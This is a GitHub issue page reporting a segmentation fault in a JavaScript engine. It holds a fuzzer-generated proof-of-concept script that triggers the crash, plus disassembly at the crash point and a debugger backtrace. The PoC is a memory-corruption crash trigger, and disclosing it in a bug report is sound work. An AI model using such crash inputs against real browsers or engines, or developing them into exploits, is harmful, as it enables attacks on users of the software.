Skip to content

Segmentation fault #6643

New issue
New issue
Open
Open
Segmentation fault#6643
@bird8693

Description

@bird8693
bird8693
opened on Mar 17, 2021

enviroment

ubuntu 16

poc

function main() {
    var HWyR = 268435456 <= 9007199254740991;
    let arr = [
        1.1,
        2.2,
        3.3
    ];
    for (let i = 0; i < 65536; i++) {
        opt();
    }
    Array.prototype.__defineGetter__('x', Object.prototype.valueOf);
    var aKGJ = Symbol;
    print(opt());
}
var r = new Object();
var r = new Object();
for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
    var nrYB = Symbol;
}
let arr = [];
var CollectGarbage = new Object();
var r = new Object();
var Mchh = vars >= r;
var vars = [];
var r = new Object();
JSON.parse(null);
once = CollectGarbage != 1.3;
var ThnA = +9007199254740994;
var PHrh = -9007199254740991;
once = true;
var Jknd = Date;
var r = new Object();
var YQZc = +0.1;
var CollectGarbage = new Object();
for (var Rjsi = new Uint32Array([1200]); i < 20000; i++) {
    vars[-1] = 'aaaaa';
}
var r = new Object();
r.lastIndex = 'aaaaa';
once = CollectGarbage != 1.3;
r.lastIndex = 'aaaaa';
for (var i = 20000; i < 40000; i++) {
    vars[vars.length] = 'aaaaa';
    var xxKn = 3.141592653589793 * 1e-81;
    for (var i = 20000; i < 40000; i++) {
        vars[i] = ' \'\' ';
        var JfHf = CollectGarbage ** r + 1073741825;
        vars = !NaN;
        Array.prototype.length = 0;
    }
    for (var i = 20000; i < 40000; i++) {
        for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
            var Jknd = Date;
        }
        once = Mchh.valueOf();
        var HWyR = 268435456 <= 9007199254740991;
        var dmdd = CollectGarbage % 1200;
        var dmdd = CollectGarbage % 1200;
        vars[-1] = 'aaaaa';
        var CollectGarbage = new Object();
        var SSsr = 2147483649 + -4294967297;
        var Rjsi = new Uint32Array([1200]);
        once = Mchh.valueOf();
        var cJjF = delete NaN;
        var nmMt = new Set([3.141592653589793]);
        var chhy = new RegExp(null);
        var dmdd = CollectGarbage % 1200;
        var RjjJ = -1;
        once = CollectGarbage != 1.3;
        var winE = Promise;
    }
    var dmdd = CollectGarbage % 1200;
    vars[-1] = 'aaaaa';
    once = Mchh.valueOf();
    vars[vars.length] = 'aaaaa';
    var r = new Object();
    var nmMt = new Set([3.141592653589793]);
    var Mchh = vars >= r;
}
var dmdd = CollectGarbage % 1200;
var sRcZ = Proxy;

output

command line output

Segmentation fault (core dumped)

crash point

   0x7ff7f2f932de                  push   0x48ca8b48
   0x7ff7f2f932e3                  shr    ecx, 0x30
   0x7ff7f2f932e6                  jne    0x7ff7f2f93cc9
 → 0x7ff7f2f932ec                  mov    rcx, QWORD PTR [rdx+0x8]
   0x7ff7f2f932f0                  xor    edi, edi
   0x7ff7f2f932f2                  cmp    rcx, QWORD PTR [r13+0x480]
   0x7ff7f2f932f9                  jne    0x7ff7f2f93ce5
   0x7ff7f2f932ff                  cmovne rdx, rdi
   0x7ff7f2f93303                  mov    rdi, QWORD PTR [r15+0x4d0dc]

callstack

gef➤ bt
#0 0x00007ff7f2f932ec in ?? ()
#1 0x0000555500000002 in ?? ()
#2 0x00007ff7f2f1f480 in ?? ()
#3 0x00005555573d9d20 in LegalInstrFormsImpl::LEGAL_N_R_R ()
#4 0x00007ffff695b53c in __GI___libc_free (mem=) at malloc.c:2968
#5 0x00007fffffffd220 in ?? ()
#6 0x00007ffff7fc37a8 in ?? ()
#7 0x0000000000000000 in ?? ()

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions